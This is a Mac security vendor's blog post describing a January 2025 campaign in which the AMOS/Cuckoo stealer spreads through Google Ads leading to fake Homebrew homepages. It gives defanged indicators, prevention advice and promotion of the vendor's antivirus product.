Over the past couple years, we’ve written a lot about stealer malware that infects Macs. One malware family that frequently resurfaces is Atomic Stealer, or AMOS (short for Atomic macOS Stealer). AMOS is designed to exfiltrate sensitive data from infected Macs; this typically includes things like saved passwords, cookies, autofill text, and cryptocurrency wallets. A sub-variant known as Cuckoo first appeared in May 2024.
Just like last year, Cuckoo has been spreading in January 2025 via elaborate campaigns, leveraging malicious but legitimate-looking Google Ads that redirect to lookalike homepages with Trojan downloads. Here’s everything you need to know about the latest Cuckoo variants, and how to stay protected.
In this article:
Atomic macOS Stealer (AMOS, or AtomicStealer) first surfaced in late April 2023. At the time, a threat actor began selling it via Telegram as malware as a service, licensable for $1,000 per month. Since then, we’ve seen a plethora of AMOS variants emerge.
Most often, AMOS malware is distributed through malicious Google Ads campaigns. These poisoned Google ads appear at the top of search results, where many people will see and click on them. In some cases, the ads are virtually indistinguishable from legitimate Google Ads run by the real software companies they mimic.
Some antivirus companies dubbed a particular sub-class of AMOS variants “Cuckoo.” Back in May 2024, we wrote about Cuckoo variants that were spreading via poisoned Google Ads that look like they redirect to the real Homebrew homepage, but in fact led to malware distribution sites.
On January 9, 2025, a malware researcher noted that Homebrew was back with a new lookalike homepage.
Cuckoo is back with another fake homebrew website
brewmacos[.]com
C2: 185.62.56[.]131@birchb0y @AdamJKohler @L0Psec @IntegoSecurity— Grégoire Clermont (@gregclermont) January 9, 2025
A little over a week later, more reports emerged with additional details; one developer reported that he had observed a malicious Google Ads campaign leading to a different fake Homebrew site. The next day, a malware researcher posted about a third fake Homebrew homepage.
Developers, please be careful when installing Homebrew. Google is serving sponsored links to a Homebrew site clone that has a cURL command to malware. The URL for this site is one letter different than the official site. pic.twitter.com/TTpWRfqGWo
— Ryan Chenkie (@ryanchenkie) January 18, 2025
The real Homebrew is a popular macOS software package manager.
Each of the new fake Homebrew homepages tries to trick users into copying and pasting a command from the site into their Mac’s Terminal app. While that might sound ridiculously suspicious and dangerous—and it normally would be—the legitimate Homebrew software is actually installed in this exact way. Both the Google Ads and lookalike pages are so convincing that many professionals have said they could have fallen for the scheme.
A fake Homebrew site, part of an AMOS/Cuckoo Mac malware campaign.
Compare for yourself. Would you have guessed correctly which is real, and which is fake?
The real Homebrew site. Ironically, it has a longer, more suspicious-looking install URL.
Interestingly, this is not the first time that malware has tried to disguise itself as Homebrew. As we mentioned, there was the first Cuckoo campaign in May 2024. Back in 2020, threat actors used another domain that was similar to that of the real Homebrew site, as part of a typosquatting campaign. And back in 2017, Mac malware known as Dok used “homebrew” in the filename of one of its LaunchAgents.
We strongly recommend that everyone get out of the habit of “just Google it” to find legitimate sites. Such habits often include clicking on the first link without giving it much thought, under the assumption that Google won’t lead them astray, and will give them the correct result right at the top. Malware makers know this, of course, and that’s why they’re paying Google for the number-one position.
Until or unless Google does a much better job of vetting its ads, a better practice than “Google it” would be to bookmark trusted sites whenever possible, and to go back to those bookmarks in the future.
If you use Intego VirusBarrier, you’re already protected from this malware.
If you believe your Mac may be infected, or to prevent future infections, it’s best to use antivirus software from a trusted Mac developer. VirusBarrier is award-winning antivirus software, designed by Mac security experts, that includes real-time protection. It runs natively on both Intel- and Apple silicon-based Macs, and it’s compatible with Apple’s current Mac operating system, macOS Sonoma.
One of VirusBarrier’s unique features is that it can scan for malicious files on an iPhone, iPad, or iPod touch in user-accessible areas of the device. To get started, just attach your iOS or iPadOS device to your Mac via a USB cable and open VirusBarrier.
If you use a Windows PC, Intego Antivirus for Windows can keep your computer protected from malware.
This article will be updated soon with additional indicators of compromise (IOCs) for the Mac malware samples and malicious domains used in this Cuckoo campaign. Check back here and refresh the page later for further technical details.
To learn more about the previous Cuckoo variant, see Intego’s original report on OSX/Cuckoo malware.
Intego discovers new “Cuckoo” Mac malware mimicking Homebrew
Be sure to also check out our 2025 Apple malware forecast and our previous Mac malware articles from 2025 and earlier.
You can also subscribe to our e-mail newsletter and keep an eye here on The Mac Security Blog for the latest Apple security and privacy news. And don’t forget to follow Intego on your favorite social media channels: 
